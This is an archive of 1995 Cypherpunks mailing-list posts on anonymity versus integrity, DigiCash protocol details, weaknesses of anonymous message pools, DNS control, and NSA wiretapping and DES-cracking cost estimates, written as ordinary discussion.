From gjeffers at socketis.net Thu Nov 2 01:31:15 1995 From: gjeffers at socketis.net (Gary Jeffers) Date: Thu, 2 Nov 1995 17:31:15 +0800 Subject: Was I censored by a sophisticated word parser/key word searcher? Message-ID: <199511021323.HAA09729@mail.socketis.net> My original plaintext post of Internet control by spooks has still not been posted. I have made 2 posts since that were posted quickly. Are things getting BAD!? Could I have fucked up? Do remailers now have a new use? Should remailers with encryption be used to spread the alarm to the rest of the Internet? My fellow Cypherpunks with bigger Internet mechanics brains should check this out. Can the original BLACKOUT post be reposted to other mailing lists or will it be censored? Check it out! - Beat State! - Gary Jeffers

From tbyfield at panix.com Thu Nov 2 02:12:51 1995 From: tbyfield at panix.com (t byfield) Date: Thu, 2 Nov 1995 18:12:51 +0800 Subject: Was I censored Message-ID: At 3:15 AM 11/2/95, Gary Jeffers wrote: >My original plaintext post of Internet control by spooks has still not been >posted. I have made 2 posts since that were posted quickly. Are things >getting BAD!? Could I have fucked up? Do remailers now have a new use? And at 4:45 am or so, having worked all bloody night--having received all the posts you mention--I'm responding: (1) Chill out, chum. (2) CP maybe isn't the best place to post internal dialogues.
(3) There's a good chance that many people on this list have had one or another experience with automagically/mysteriously delayed mail: AFAICT, we're all still here. If you'd like, I'll confirm that I heard my echo from the listserv. and (4) If you live around the NY/NY area, give WFMU some money; and even if you don't, give them some money. If the spooks are ever stupid enough to "black out" the net, some fruit with very fine musical taste at FMU will let everyone know. But only with your support. Ted From llurch at networking.stanford.edu Thu Nov 2 02:33:19 1995 From: llurch at networking.stanford.edu (Rich Graves) Date: Thu, 2 Nov 1995 18:33:19 +0800 Subject: From Bill Frezza: Electronic Warfare In-Reply-To: <199511010500.GAA03716@utopia.hacktic.nl> Message-ID: On Wed, 1 Nov 1995, Anonymous wrote: > On Tue, 31 Oct 1995, Bill Frezza wrote: > > > Attached is a column that will appear on the op-ed page of tomorrow's > > (10/30) Communications Week that was stimulated largely by a report filed > > > Cypherpunks mailing list (majordomo at toad.com) you can get some excellent > > list address is cypherpunks at toad.com > list manager is majordomo at toad.com > sending list mail to majordomo will not work Sending mail without valid commands to majordomo will give you a help file. You don't *really* want the actual list address to be published everywhere, do you? I think the noise/signal ratio is high enough already. cypherpunks-request at toad.com would have been better, because it gives a more specific help file. URL would have been better still. But not the address. -rich From carolann at censored.org Thu Nov 2 02:43:31 1995 From: carolann at censored.org (Censored Girls Anonymous) Date: Thu, 2 Nov 1995 18:43:31 +0800 Subject: Happy Halloween! Message-ID: <199510312107.VAA11674@mailhost1.primenet.com> May you find happiness on the Yellow Brick Road of Cryptography. 
(costuming of the highest art) Love Always, Carol Anne -- Member Internet Society - Certified BETSI Programmer - Webmistress *********************************************************************** Carol Anne Braddock (cab8) carolann at censored.org 206.42.112.96 My Homepage The Cyberdoc *********************************************************************** ------------------ PGP.ZIP Part [017/713] ------------------- M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M MF=O0H+*%(-S%&>S%+FS& http://dcs.ex.ac.uk/~aba/export/ From jya at pipeline.com Thu Nov 2 02:47:33 1995 From: jya at pipeline.com (John Young) Date: Thu, 2 Nov 1995 18:47:33 +0800 Subject: PRL_har Message-ID: <199510312321.SAA05260@pipe4.nyc.pipeline.com> Ito has shared an LA Times report of October 21 on frantic Japanese economic espionage, there and in the US, and its booming bugging and wiretapping industry. And The Wash Post simpers today about the CIA-Mils self- sucking into the eco-spy quagmire to garner funds, as spit in its toon yesterday. More non-crypto: FinTimes jabbers today in "Cars safe from phone threat," on the weird effects on automobile "electronic-based safety-critical systems" of pervasive sources of electro-magnetic interference, say by your mobile phone or police transceivers, that may catapult the family-fun Land Rover into Rancid's roadbus. PRL_har (3 all 15 kb) From fc at all.net Thu Nov 2 03:41:54 1995 From: fc at all.net (Dr. Frederick B. Cohen) Date: Thu, 2 Nov 1995 19:41:54 +0800 Subject: [FRED] Anonymity and Integrity In-Reply-To: <199511020504.AAA19291@thor.cs.umass.edu> Message-ID: <9511021110.AA01070@all.net> > Dr. Frederick B. Cohen writes: > > I have been convinced for some time that you can't have both integrity and > > anonymity. > [and in a followup] > > I might be misinterpreted as having meant that it is impossible to have > > both integrity and anonymity. That is not what I meant, [...] > > Er, thanks for the clarification.... 
A typical quotation taken out of context. You missed the part after "I meant" where I explained that I meant you couldn't assure ... - That is, you could have both or not have both, but you couldn't be certain that you had both. > > Integrity:= 1) Steadfast adherence to a strict moral and ethical code. > > 2) A state of being unimpaired; soundness. > > 3) The quality or condition of being whole or undivided; soundness > > Also) soundness, completeness, > > Alternatively: > > 1) Strict personal honesty and independence... > > 2) Completeness; unity... > > 3) The state of being unimpaired; soundness...'' > > > > In this context, I might be misinterpreted as having meant that it is > > impossible to have both integrity and anonymity. That is not what I > > meant, although it is probably also true in a very strict sense. > > All right, what makes you think that ? Lest we wave our hands too much and > totally misunderstand each other, let me lay down a more concrete scenario. > If you have a substantially different scenario in mind, let me know. > > Suppose that I send an anonymous message to a public forum such as this. I > and the message seem to "have anonymity" by any standard I can presently > imagine. Now, in what ways might I or the message lack integrity in this > situation ? If the message was not of any particular import to anyone, integrity would not be a very big issue, but suppose you took quotes out of context and cleverly tried to construct a picture of the other person as not being reputable. People who read the message might believe that what you said was true, or at least had a grain of truth to it. That sort of message lacks integrity, and the reason it lacks integrity is because it has anonymity, not just because it's false and misleading. To clarify even further, I seem to recall a posting some months ago from an anonymous source declaring a new on-line for-sale forum called the Internet Security Newsletter (or some such thing). 
The anonymity of the poster in the context of asking for money and the fact that one of the people who was claimed to be on the board of editors was not, in fact, a participant, led to the question of who the person was. It turned out that this person had a substantial history of putting forth falsehoods as well as other related things that might have been very helpful in evaluating the credence of his statements. It turned out that the newsletter was, at least in some sense and without making value judgements, legitimate; but the anonymity of the person making the posts made it harder to assure the integrity of the statements made, which exacerbated the assurance issue. > I haven't broken my personal ethical codes, although perhaps > I've violated someone else's. I have been honest, at least as much as I am > generally honest in anything I write. I am not lying by donning the cloak of > anonymity; I have not misrepresented my identity, merely refused to reveal > it. The content of the message can be considered sound as much as anything > else can. The message is incomplete in the sense that it does not include > the true identity of the author -- is this what you would claim as a > failure of integrity ? All messages are incomplete in the sense that > various important facts are absent from them. I don't know you, which also means that I don't know your motives. This brings up the problem that, even though your postings may be true and your motives honorable, they may not be, and there is no way to look into your background and evaluate your history in order to assess your statements. In many cases, I believe statements because of their source and my experience with that source. I understand that over time, reputations can be built up for pseudonyms (which are not necessarily anonyms) but then, with a pseudonym we might reasonably ask what the motive is for hiding the real identity. Is it for fun? Because it's there? 
In solidarity for those who have legitimate reasons for remaining anonymous? Or is it a means to influence others for personal or national gain? Is it a way of spreading disinformation? Is it a way to escape liability for slanderous statements? Is it a way to keep people from finding out that there is a personal grudge being played out? Without knowing the motive, how can we assess the statements? In fact, how can we know that the original pseudonym still applies? Someone could kill you and take over your pseudonym, and even though we might hear of your death, the pseudonym might continue based on your reputation but with another actual source. It's an interesting concept that each statement should/could be taken on its own and evaluated independently of the rest of a person's life context, but in my experience, that has serious problems. > > To clarify, I don't think you can assure integrity when you have anonymity. > > > > This follows from my earlier writings (circa 1984-89), which are fairly > > extensive, and in which I made the only marginally supported claim that > > you can't have (i.e., assure) both integrity and secrecy in a system > > with sharing. This came originally from the result that integrity + > > secrecy = no sharing (ala the combination of Biba and Bell-LaPadula) > > which was extended into a POset which characterizes the extent to which > > integrity and secrecy can be maintained based on transitive information > > flow. > > > > The less mathematical reasoning is that in order to be able to verify > > integrity, you have to be able to examine the information that is > > secret, while having secrecy requires that you not be able to have > > independent verification. Thus the two limit each other. > > > > Anonymity, in this context, can be thought of as secrecy. > > I understand the nature of the information flow argument, but I don't see > that it's applicable.
You appear to contend that the assurance of the > integrity of an anonymous message depends upon the examination of > information that is "secret", that is, _not part of the message_. But no > message is complete -- all messages have many such associated "secrets" not > available as part of the messages. So the claim seems to be vacuous: we > can assure the integrity of neither anonymous nor verinymous messages. An important point. The more we know, the more certain we can be. With computer-based anonymity as it is practiced today, and ignoring the examples of the pseudonyms that were broken by legal warrant, we have very little knowledge about the originator of a message, and thus we have very little assurance of the integrity of their messages. The history built up over time for a given pseudonym certainly increases the assurance associated with it, but there are other problems with this. Example: I have two (N) pseudonyms that put forth different points of view specifically directed to create different kinds of credence to different audiences. If the audiences knew that both (several) of the pseudonyms were in fact the same person, they would have very different beliefs about the individual given the combined picture than they might get from any one of the pictures. > Perhaps the rejoinder will be that anonymous messages have a > _characteristic_ piece of missing "secret" information, namely the senders' > True Names. But you have yet to offer any argument that only certain special > "secrets" must be examined in order to verify integrity. It's not only the True Name that's at issue. It's the association of a set of messages and historical information with a source. For example, if we knew you were a KGB agent working in the disinformation and economic espionage branches, we might evaluate your postings differently than if we knew you were a high-school student from Duluth whose father taught her a lot about cryptography when she was young.
-- -> See: Info-Sec Heaven at URL http://all.net Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From liberty at gate.net Thu Nov 2 05:25:45 1995 From: liberty at gate.net (Jim Ray) Date: Thu, 2 Nov 1995 21:25:45 +0800 Subject: [NOISE] (Was: Re: US government department for crime...) Message-ID: <199511021311.IAA59742@tequesta.gate.net> -----BEGIN PGP SIGNED MESSAGE----- John Young wrote, in his unique style: >Still, anonymous does make an astutely ironic observation, in >humorous lifting of the customary FinCEN cloak: > >That the hydra-headed agency may be literally aim at financial >*crimes* enforcement rather than enforcement of the laws >against such deeds. > > >Especially given the participating renegade agencies who seem >to absolve themselves of these laws. > > >Perhaps anonymous is right, they are a band of outlaws, daring >to overtly flaunt it, expecting no opposition from the gullible >cowed. > Actually, it's *two* bands of outlaws in concert, and the "gullible cowed" are beginning to clamor for anything else. This could be an interesting election year, if the media would ever-in-hell get out of lap-dog mode and into watch-dog mode. [I know...I'm not holding my breath.] JMR -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Freedom isn't Freeh iQCVAwUBMJjAB21lp8bpvW01AQHnrQP/XU5uwUfR0e9ZpJ2y8+d7MExdruGwrnyW llp4rC6mNJl8IoyAkZG4ox79rK1mKqd4KzG/XP9lLzuqHCp9Cc5rR0ECe0I5RHnx WFv66KkcsvVlGSflyMiuDi3R/Ul6y4wEOCaxus4OSHM+NhOcVKQddlg0F5AgOPbL mzi7SF9/p0I= =DVN9 -----END PGP SIGNATURE----- Regards, Jim Ray "Thank God we don't get all the government we pay for." Will Rogers Visit my "Pretty Good Homepage" at http://shopmiami.com/prs/jimray/ Featuring cypherpunk privacy stuff and some of my babypictures! ----------------------------------------------------------------------- PGP key Fingerprint 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8 Key id. 
# E9BD6D35 (key on page & servers) IANAL ----------------------------------------------------------------------- Help Phil! email zldf at clark.net or http://www.netresponse.com/zldf _______________________________________________________________________

From norm at mediacity.com Thu Nov 2 06:14:48 1995 From: norm at mediacity.com (Norman Hardy) Date: Thu, 2 Nov 1995 22:14:48 +0800 Subject: Bruce Schneier's Applied Cryptography, 2nd Edition Message-ID: Stanford University Book Store (on campus) has a bunch at about $49.

From jya at pipeline.com Thu Nov 2 06:15:24 1995 From: jya at pipeline.com (John Young) Date: Thu, 2 Nov 1995 22:15:24 +0800 Subject: US government department for crime enforcement! Message-ID: <199511012333.SAA15819@pipe3.nyc.pipeline.com> Still, anonymous does make an astutely ironic observation, in humorous lifting of the customary FinCEN cloak: That the hydra-headed agency may be literally aim at financial *crimes* enforcement rather than enforcement of the laws against such deeds. Especially given the participating renegade agencies who seem to absolve themselves of these laws. Perhaps anonymous is right, they are a band of outlaws, daring to overtly flaunt it, expecting no opposition from the gullible cowed.

From futplex at pseudonym.com Thu Nov 2 06:15:34 1995 From: futplex at pseudonym.com (Futplex) Date: Thu, 2 Nov 1995 22:15:34 +0800 Subject: [FRED] Anonymity and Integrity In-Reply-To: <9511020130.AA17317@all.net> Message-ID: <199511020504.AAA19291@thor.cs.umass.edu> Dr. Frederick B. Cohen writes: > I have been convinced for some time that you can't have both integrity and > anonymity. [and in a followup] > I might be misinterpreted as having meant that it is impossible to have > both integrity and anonymity. That is not what I meant, [...] Er, thanks for the clarification.... > Integrity:= 1) Steadfast adherence to a strict moral and ethical code. > 2) A state of being unimpaired; soundness.
> 3) The quality or condition of being whole or undivided; soundness > Also) soundness, completeness, > Alternatively: > 1) Strict personal honesty and independence... > 2) Completeness; unity... > 3) The state of being unimpaired; soundness...'' > > In this context, I might be misinterpreted as having meant that it is > impossible to have both integrity and anonymity. That is not what I > meant, although it is probably also true in a very strict sense. All right, what makes you think that ? Lest we wave our hands too much and totally misunderstand each other, let me lay down a more concrete scenario. If you have a substantially different scenario in mind, let me know. Suppose that I send an anonymous message to a public forum such as this. I and the message seem to "have anonymity" by any standard I can presently imagine. Now, in what ways might I or the message lack integrity in this situation ? I haven't broken my personal ethical codes, although perhaps I've violated someone else's. I have been honest, at least as much as I am generally honest in anything I write. I am not lying by donning the cloak of anonymity; I have not misrepresented my identity, merely refused to reveal it. The content of the message can be considered sound as much as anything else can. The message is incomplete in the sense that it does not include the true identity of the author -- is this what you would claim as a failure of integrity ? All messages are incomplete in the sense that various important facts are absent from them. > To clarify, I don't think you can assure integrity when you have anonymity. > > This follows from my earlier writings (circa 1984-89), which are fairly > extensive, and in which I made the only marginally supported claim that > you can't have (i.e., assure) both integrity and secrecy in a system > with sharing. 
This came originally from the result that integrity + > secrecy = no sharing (ala the combination of Biba and Bell-LaPadula) > which was extended into a POset which characterizes the extent to which > integrity and secrecy can be maintained based on transitive information > flow. > > The less mathematical reasoning is that in order to be able to verify > integrity, you have to be able to examine the information that is > secret, while having secrecy requires that you not be able to have > independent verification. Thus the two limit each other. > > Anonymity, in this context, can be thought of as secrecy. I understand the nature of the information flow argument, but I don't see that it's applicable. You appear to contend that the assurance of the integrity of an anonymous message depends upon the examination of information that is "secret", that is, _not part of the message_. But no message is complete -- all messages have many such associated "secrets" not available as part of the messages. So the claim seems to be vacuous: we can assure the integrity of neither anonymous nor verinymous messages. Perhaps the rejoinder will be that anonymous messages have a _characteristic_ piece of missing "secret" information, namely the senders' True Names. But you have yet to offer any argument that only certain special "secrets" must be examined in order to verify integrity. -Futplex

From anonymous at wmono.remailer Thu Nov 2 06:36:58 1995 From: anonymous at wmono.remailer (Anonymous) Date: Thu, 2 Nov 1995 22:36:58 +0800 Subject: [FRED] Anonymity and Integrity Message-ID: <199511021410.IAA06974@ valhalla.phoenix.net> [note: i'm not the original 'anonymous user' in this thread] >If the message was not of any particular import to anyone, integrity >would not be a very big issue, but suppose you took quotes out of >context and cleverly tried to construct a picture of the other person >as not being reputable.
>People who read the message might believe that
>what you said was true, or at least had a grain of truth to it. That
>sort of message lacks integrity, and the reason it lacks integrity is
>because it has anonymity, not just because it's false and misleading.

I, for one, pay very little attention to the author of any given message on this list, and messages stand on their own merit. I take everything I read (here and elsewhere) with a grain of salt, and pay close attention to factual references if they are supplied so I can do my own investigating and draw my own conclusions, if the topic piques my interest.

An anonymous posting has exactly the same 'integrity quotient' as any first-time poster; the reader has no historical perspective on the author, and the message should be accepted or discarded on its own merits, not by a blind "he's usually clueful" or "who the heck is this?" attitude.

[erm.. I'm not attacking anyone here, just spewing some thoughts I haven't bothered to express yet..]

(...)

>Example: I have two (N) pseudonyms that put forth different points of
>view specifically directed to create different kinds of credence to
>different audiences. If the audiences knew that both (several) of the
>pseudonyms were in fact the same person, they would have very different
>beliefs about the individual given the combined picture than they might
>get from any one of the pictures.

[Obligatory _Ender's Game_ reference grudgingly suppressed]

This happens in 'real life' all the time. I hide the details of my geeky job from my Friday-night friends, and don't bring up my recreational pharmaceutical use with my business associates. Either group would have different feelings about me if they had a 'combined picture' of my lifestyle.

>It's not only the True Name that's at issue.
>It's the association of a

Personally, I find the quest for employment of any True Name scheme hogwash, simply because of the multifaceted nature of human existence (see above), where pseudonymity (virtual or social) is a part of everyday life.

True Names are logically almost impossible anyway. What base criteria would a government, company, or other organization use to assign and make use of a True Name? Driver's license? (fake) .. DNA fingerprint? (cloning) .. any attempt to pin /me/ down to a single facet of existence is doomed to failure, given how adept the bad guys are at keeping ahead of the good guys.

>set of messages and historical information with a source. For example,
>if we knew you were a KGB agent working in the disinformation and
>economic espionage branches, we might evaluate your postings differently
>than if we knew you were a high-school student from Duluth whose father
>taught her a lot about cryptography when she was young.

We all have hidden agendas; personally, until I reach godlike status (btw, anyone have any spare eye of newt laying around?) I'll have to be content with judging most things I read with a healthy dose of cynicism, and squeeze what 'truth' I can out of it. I've been surprised too many times by hidden goals and 'double agents' to put much stock in /anything/ sent down my pipe.

There's also an argument that the most prolific pseudonyms and 'real' account-holders have Something They Want Us To Believe and should be trusted no further than they can be thrown .. analogous, in my book, to politicians .. perhaps the anonymous are the /only/ entities we can trust...
-- Oinker - anonymous today in case any of you are my clients :P

From frank at funcom.no Thu Nov 2 07:20:58 1995
From: frank at funcom.no (Frank Andrew Stevenson)
Date: Thu, 2 Nov 1995 23:20:58 +0800
Subject: REQUEST: Win95 password encryption details
In-Reply-To: <199511020642.WAA17156@Networking.Stanford.EDU>
Message-ID:

Can anyone please give pointers to the details of the .PWL password encryption.

Thanks.

Frank

On Wed, 1 Nov 1995, Rich Graves wrote:

> ..., and someone else later picks up the .PWL files, which are not
> encrypted in a particularly secure way, ...

#include
Key fingerprint = E3 D2 BC AD BE F8 C8 2F A5 89 1D 2B 67 30 EA 1B
PGP encrypted mail preferred, finger for key

From cme at TIS.COM Thu Nov 2 07:28:07 1995
From: cme at TIS.COM (Carl Ellison)
Date: Thu, 2 Nov 1995 23:28:07 +0800
Subject: [cipher-request@itd.nrl.navy.mil: Electronic CIPHER, Issue 10, November 1, 1995, Postcard edition]
Message-ID: <9511011535.AA05757@tis.com>

Please pardon the forward -- but y'all might be interested in this newsletter...

==============================================================================
Date: Wed, 1 Nov 95 10:02:51 EST
From:
Reply-To:
To:
Subject: Electronic CIPHER, Issue 10, November 1, 1995, Postcard edition

Dear Cipher Postcard subscriber,

The next issue of Cipher (EI#10, dated November 1, 1995) is now available for downloading from the anonymous FTP site or from the Archive on the Cipher Home Page. This message includes only the table of contents and retrieval instructions. I will update the Web pages as soon as I can.
Regards,
--Carl

====================================================================
Newsletter of the IEEE Computer Society's TC on Security and Privacy
Electronic Issue 10                                  November 1, 1995
Carl Landwehr, Editor                    Hilarie Orman, Assoc. Editor
====================================================================

Contents: [1550 lines total]

Letter from the Editor
Security and Privacy News Briefs:
 o S&P '96 deadline approaches
 o LISTWATCH: WWW-Security -- by Mary Ellen Zurko
 o US Navy ship's computers penetrated during JWID '95
 o US medical records confidentiality act (S.1360) introduced
 o Microsoft security: printer/network flaws/fixes; application-level object reuse problem
 o Netscape security: bucks for break-ins
 o Separation (micro)kernel from IBM?
 o European Commission to propose cryptography policy
 o FIRST to re-form as nonprofit
 o RSA pushes for firewall security standard
Articles and Conference Reports:
 o NISS notes:
 o IFIP WG11.3 Conference on Database Security; summary by David Spooner
Calls for Papers: Many!
Reader's guide to recent security and privacy literature
 o Conference Papers
 o Journal and Newsletter articles
Calendar
Who's Where: recent address changes
New Reports available via FTP and WWW
Interesting Links
DSL subscription offer
How to join the TC on Security and Privacy
Publications for sale
TC officers
Information for Subscribers and Contributors
____________________________________________________________________

Retrieval instructions:

There is an archive that includes each copy distributed so far, in ascii, in files you can download at URL http://www.itd.nrl.navy.mil/ITD/5540/ieee/cipher/cipher-archive.html

There is also an anonymous FTP server that contains the same files.
To access the archive via anonymous FTP:

 1. ftp www.itd.nrl.navy.mil
 2. At prompt for ID, enter "anonymous"
 3. At prompt for password, enter your actual, full e-mail address
 4. Once you are logged in, change to the Cipher Directory: cd pub/cipher
 5. Now you can request any of the files containing Cipher issues in ascii. Issues are named in the form: EI#N.9506 where N is the number of the issue desired and 9506 captures the year and month it first appeared.

=======end of Electronic Cipher Issue #10, 1 November 1995================

From lvhove&vnet3.vub.ac.be at vnet3.vub.ac.be Thu Nov 2 08:32:25 1995
From: lvhove&vnet3.vub.ac.be at vnet3.vub.ac.be (Leo Van Hove)
Date: Fri, 3 Nov 1995 00:32:25 +0800
Subject: Info needed on observers
Message-ID:

Hi,

I am currently preparing a paper on payment systems for the Internet and related issues. I recently found out that so-called observers could be placed on smart cards (in order to prevent double spending, or even to prevent people from cheating on taxes...). To be honest that's about all I know about observers and I am very eager to find out more. I am, however, having a hard time finding interesting references on this subject. Hence, all suggestions to get me started would be extremely welcome.

Questions of particular interest are: possible functions (and limits), how 'real' are they already?, what about privacy?, ...

Many thanks in advance.
leo
_________________________________________________________________________
Leo Van Hove
Centre for Financial Economics
Vrije Universiteit Brussel (Free University of Brussels)
Pleinlaan 2
B-1050 Brussels
Vox: +32 629.21.25
Fax: +32 2 629.22.82
e-mail: lvhove at vnet3.vub.ac.be
_________________________________________________________________________

From hfinney at shell.portal.com Thu Nov 2 08:34:44 1995
From: hfinney at shell.portal.com (Hal)
Date: Fri, 3 Nov 1995 00:34:44 +0800
Subject: ecash remailer
In-Reply-To: <199511020239.SAA27491@ix.ix.netcom.com>
Message-ID: <199511021523.HAA19598@jobe.shell.portal.com>

It's very frustrating to have to speculate so much due to the lack of information. Imagine how we would react if Cybercash or Netscape had gone forward with what they claimed were secure protocols but had refused to publish them, referring simply to old papers on RSA and DES. Yet Digicash gets away with this.

Bill Stewart writes:
>At 01:20 PM 11/1/95 -0500, Michael Froomkin wrote:
>>I thought a property of Chaumian DigiCash was that a coin *had* to go back
>>to the bank before it could be spent again.
>No. The basic Chaum Digicash method looks like this:
>1) Alice creates a number of a recognizable form (Chaum's 1985 CACM paper
>uses n1n2n3...n64n1n2n3....n64, i.e. a 64-bit number concatenated with itself).
>2) Alice blinds the number and sends it to the bank (along with some request
>for withdrawing money from her account or payment in other coin or whatever.)
>3) The bank signs the number and sends it back.
>4) Alice unblinds the coin; now it's good, recognizably signed, and untraceable.

We presume it works basically like this, but there could be elaborations. In particular, I have heard (from people who claim to know) that the payee is normally embedded into the coin at spending time.

>>Logically, I can see at least four possibilities:
>>1) payee data is encoded onto the coin at time of payment, making it
>>impossible for Carol to bank the coin.
>>I see no evidence of this in the
>>docs at the Digicash site, but I just rechecked quickly and may have
>>missed it.
>The basic protocol doesn't say anything about what a valid coin looks like;
>you could use the example in Chaum's paper or a long string followed by
>a checksum or whatever. You _could_ put the payee's name account number
>in the string as the 64-bit "random" number, or even put both payer and payee.
>The bank could insist on that sort of thing if they wanted.
>If I remember right, the version in the Digicash trial left you the choice
>of filling in a specific payee or using "@" for bearer-payable coins.

Doing this would require the payee to be known at withdrawal time, which is not apparently how it works. I would speculate that actually what happens is that the "basic coin" as above is encrypted, along with the payee identity, all under the public key of the bank. This way the identity could not be stripped out by the payee or by a thief who snooped the transmission.

Hal

From nobody at replay.com Thu Nov 2 09:29:39 1995
From: nobody at replay.com (Name Withheld by Request)
Date: Fri, 3 Nov 1995 01:29:39 +0800
Subject: alt.anonymous.messages considered harmful
Message-ID: <199511021625.RAA17800@utopia.hacktic.nl>

alt.anonymous.messages considered harmful.

The advantage of using an anonymous message pool over using a chained reply block is, of course, the huge number of potential recipients. However, there are a number of problems, including a serious attack. Some of them could be avoided with a slightly different approach.

1. When reading news on a server not under her direct control, Alice lets leak information (article selection, time used per article), so that she loses the additional security of using a message pool. She can avoid this by processing alt.anonymous.messages off line.

2.
By sending messages of a certain size and number to a pseudonymous address, an attacker can find out that the pseudonymous user participates in the pool: The encrypted messages are public; encryption does not affect size and number of messages. This information is also available at the alias server. That is not a problem as such. Anonymity is protected by the size of the pool. In combination with 1., this attack can lead to disclosure of a pseudonym.

3. Denial of service attack. If the attacker can delay or suppress delivery of messages to a subset of the recipients, the pseudonym's reaction to the message or lack thereof reveals which subset the user belongs to. He can track down the pseudonym to Alice with O(log(n)) messages. This is a practical attack, not restricted to a single point of failure such as the local news server: Persons at well-connected Usenet sites can send cancel (or superseding) messages with restricted distribution by use of the Distribution: and Path: lines. Those who do get the message, can not notice a cancel attack; those who don't, would have to carefully search for suspicious Supersedes: lines and monitor the control newsgroup. A denial of service attack by manipulated Path: header cannot be detected by the victim.

Denial of service attacks could be made somewhat less feasible by making the pool accessible as a mailing list and via http. Some problems not related to security (such as restricted availability and bogus cross-posted traffic in the newsgroup) could also be solved by reproducing the encrypted posts to alt.anonymous.messages in a mailing list.

Identification of encrypted messages as needed for 2. and helpful for 3. can be prevented by using a fixed-size message format and inserting cover messages. If these messages are numbered and signed by the alias server, users can detect denial of service attacks (but not distinguish them from network errors) and try to get the messages through another channel.
For perfect security, however, feedback from all participants would be required during transmission of the message. This is hardly possible. So, for highest security return addresses, an "everyone a remailer" mix net might be the better solution.

From dreschs at mpd.tandem.com Thu Nov 2 09:45:01 1995
From: dreschs at mpd.tandem.com (Sten Drescher)
Date: Fri, 3 Nov 1995 01:45:01 +0800
Subject: censored? corrected [Steve Pizzo cited in The Spotlight]
In-Reply-To: <199511020847.AAA10833@jobe.shell.portal.com>
Message-ID: <199511021624.KAA05751@galil.austnsc.tandem.com.>

Rich Graves said:

RG> On Thu, 2 Nov 1995 anonymous-remailer at shell.portal.com wrote:

>> But control of Internet domain name registration means the ability to
>> remove troublesome-or outspoken-computer systems from the
>> network. Potentially, this control also confers the power to
>> insinuate "phantom" domains into the network-for surveillance
>> purposes, for example-or for real-time, automatic censorship.

RG> Anyone capable of sending this message should have known that this
RG> was complete BS.

Is it? This is the _one_ thing in the article (is that term giving it too much legitimacy?) that I thought was barely true. Whoever controls the root level DNS servers effectively controls the Internet. I postulated a couple of months ago about how the US Govt might attempt to censor the rest of the world: "Remove lurid.porno.site.other-country from your DNS system within 72 hours or we will remove references to your DNS servers from the root level servers.". (I also speculated that if the US Govt tried doing this, that an 'underground' DNS system would form almost immediately.)

>> Furthermore, anecdotal evidence gathered by this author suggests that
>> actual "truth control" is taking place on the 'net now. E-mail
>> messages with controversial contents-including the details of the
>> SAIC takeover of domain names-have consistently disappeared as they
>> travel across the network.
RG> And now we have PROOF! For THIS VERY MESSAGE, sent to THIS VERY LIST
RG> only EIGHT HOURS AGO was MYSTERIOUSLY DISAPPEARED! Hide the women
RG> and children!

At least, it was allegedly lost. If I were wanting to hype it, I'd just _claim_ that it was lost.

Sten
--
#include /* Sten Drescher */
To get my PGP public key, send me email with your public key and Subject: PGP key exchange
Key fingerprint = 90 5F 1D FD A6 7C 84 5E A9 D3 90 16 B2 44 C4 F3

From rajaram at morgan.com Thu Nov 2 10:06:00 1995
From: rajaram at morgan.com (P. Rajaram)
Date: Fri, 3 Nov 1995 02:06:00 +0800
Subject: ecash remailer
In-Reply-To: <199511020239.SAA27491@ix.ix.netcom.com>
Message-ID: <9511021209.ZM7820@morgan.com>

On Nov 2, 7:23am, Hal wrote:
> Subject: Re: ecash remailer
> It's very frustrating to have to speculate so much due to the lack of
> information. Imagine how we would react if Cybercash or Netscape had
> gone forward with what they claimed were secure protocols but had
> refused to publish them, referring simply to old papers on RSA and
> DES. Yet Digicash gets away with this.

So, refuse to buy their money. Demand open systems. If you feel like being more terroristic, get Markoff to write an article on how a cypherpunk expert feels that the Mark Twain Bankshares system 'may' be insecure.

-r

From hallam at w3.org Thu Nov 2 10:10:11 1995
From: hallam at w3.org (hallam at w3.org)
Date: Fri, 3 Nov 1995 02:10:11 +0800
Subject: FBI seeks huge wiretapping system
In-Reply-To: <199511020955.BAA04564@you.got.net>
Message-ID: <9511021709.AA03831@zorch.w3.org>

On this topic...

We had lunch with the deputy director of the NSA yesterday. In between agreeing to put backdoors in the Internet, help round up subversives and build a DES cracker :-) the topic of telephone tapping came up.

One point that was quite clear, a lot of what happens in the federal government has more to do with the agency structure than common sense.
When the NSA are being asked to comment on an export license they are being asked "is this thing dangerous", not "should it be exported". But when the response comes back to commerce "it's dangerous" you can hardly expect the person on the other end to put their neck out on the line and risk allowing an export license.

Put another way this is a bureaucracy where the objective is to avoid the negative rather than gamble for a positive. Where risks are taken they are calculated bureaucratic risks.

What is needed is a federal task force to reevaluate the crypto export issue. This should look at whether the effect of the embargo is positive or negative. Of course the result would be known in advance but would provide a shield to hide behind. Would be useful if some other counterproductive policies were re-examined at the same time, like the persecution of Phil Zimmermann.

On ITAR he did say that the policy met the desired objective. The particular objective concerned was not stated however. Probably if they could tell us the objective we could provide a solution but then again if they told us it would probably defeat the objective in itself.

On telephone tapping the statement was made that they do not allow unauthorized taps and that technology was making wildcat taps by local officials harder. Which makes sense. If the taps are performed digitally they should be easier to monitor at a management level.

It is a fair point that just because technology has changed the nature of the game it should not mean that wiretaps cease to be possible. What is very odd however is the FBI request for $500 million. This is a somewhat large quantity of money to say the least. The telephone switches are programmable these days, it should be possible to provide tapping at substantially less cost. Mind you the Federal government is not known for tight cost control.
The NSA reckoned that a DES cracker would cost substantially more than $1 million because the system costs would be much higher than the component costs. "And it would only be able to operate on one keystream at once", also note "DES is used more for authenticity than for confidentiality by banks". One reading, the NSA can get the info they need at less cost than breaking DES because the financial feeds are using DES to provide CBC residues for MACs rather than encryption.

Anyway the NSA price estimate was "two or more orders of magnitude more in cost". I dispute that since we brought in the ZEUS trigger system at around $40 million five years ago and it is vastly more complex than a DES cracker, this constitutes a system cost of about ten times the raw component cost. There was considerably more component diversity and system complexity than any cypher machine would need. The raw input bandwidth of 6 Terabytes/sec would chew up DES keyspace very quickly (ie it is equivalent to exhausting a 40bit keyspace in a second).

If the NSA want a cheap DES cracker they have my number. I'll take 5% of the difference between the actual cost and $100 million (their estimate of cost) as my fee.

Phill

From tomw at orac.engr.sgi.com Thu Nov 2 11:10:50 1995
From: tomw at orac.engr.sgi.com (Tom Weinstein)
Date: Fri, 3 Nov 1995 03:10:50 +0800
Subject: /dev/random for FreeBSD [was: Re: /dev/random for Linux]
